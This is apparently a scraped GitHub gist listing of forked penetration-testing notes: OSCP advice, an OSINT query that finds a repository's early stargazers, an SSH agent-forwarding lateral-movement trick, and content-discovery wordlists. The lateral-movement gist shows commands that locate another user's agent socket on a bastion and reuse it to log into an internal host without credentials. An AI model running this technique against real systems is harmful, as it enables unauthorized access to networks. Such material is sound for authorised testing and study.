UPDATE: Excellent resource here: https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html
- Recon
- Find vuln
- Exploit
- Escalate
- Document it
Mohammad Agha sulaimanzai
sulaimanzai
/ how-to-oscp-final.md
Created
May 23, 2022 07:54
— forked from meldridge/how-to-oscp-final.md
How to pass the OSCP
sulaimanzai
/ Get_Early_Stargazers.graphql
Created
January 3, 2022 07:58
— forked from nil0x42/Get_Early_Stargazers.graphql
[OSINT] Get early stargazers of a GitHub repository for org/user info gathering
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get_Early_Stargazers #OSINT #recon trick, by @nil0x42 | |
| # Get list of first people to star a GitHub repository. | |
| # Those are more likely to be closely connected to target org/user | |
| # Run this query with wanted owner/name in GitHub GraphQL explorer: | |
| # - https://developer.github.com/v4/explorer/ | |
| query Get_Early_Stargazers { | |
| repository(owner: "sherlock-project", name: "sherlock") { |
sulaimanzai
/ SSH Agent Forwarding.md
Created
January 7, 2021 09:50
— forked from int0x80/SSH Agent Forwarding.md
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
sulaimanzai
/ content_discovery_all.txt
Created
December 18, 2020 12:29
— forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ` | |
| ~/ | |
| ~ | |
| ×™× | |
| ___ | |
| __ | |
| _ |
sulaimanzai
/ subdomain_wordlist.md
Created
December 16, 2020 21:54
— forked from michaellcader/subdomain_wordlist.md
Subdomain Wordlist
cmd@fb:/tmp|❯ wc -l 15m_sub_wordlist.txt
15677820 15m_sub_wordlist.txtcmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
sulaimanzai
/ chmodCheatSheet.md
Created
October 17, 2020 19:42
— forked from juanarbol/chmodCheatSheet.md
Chmod cheat sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Text; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.ComponentModel; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Net.Sockets; |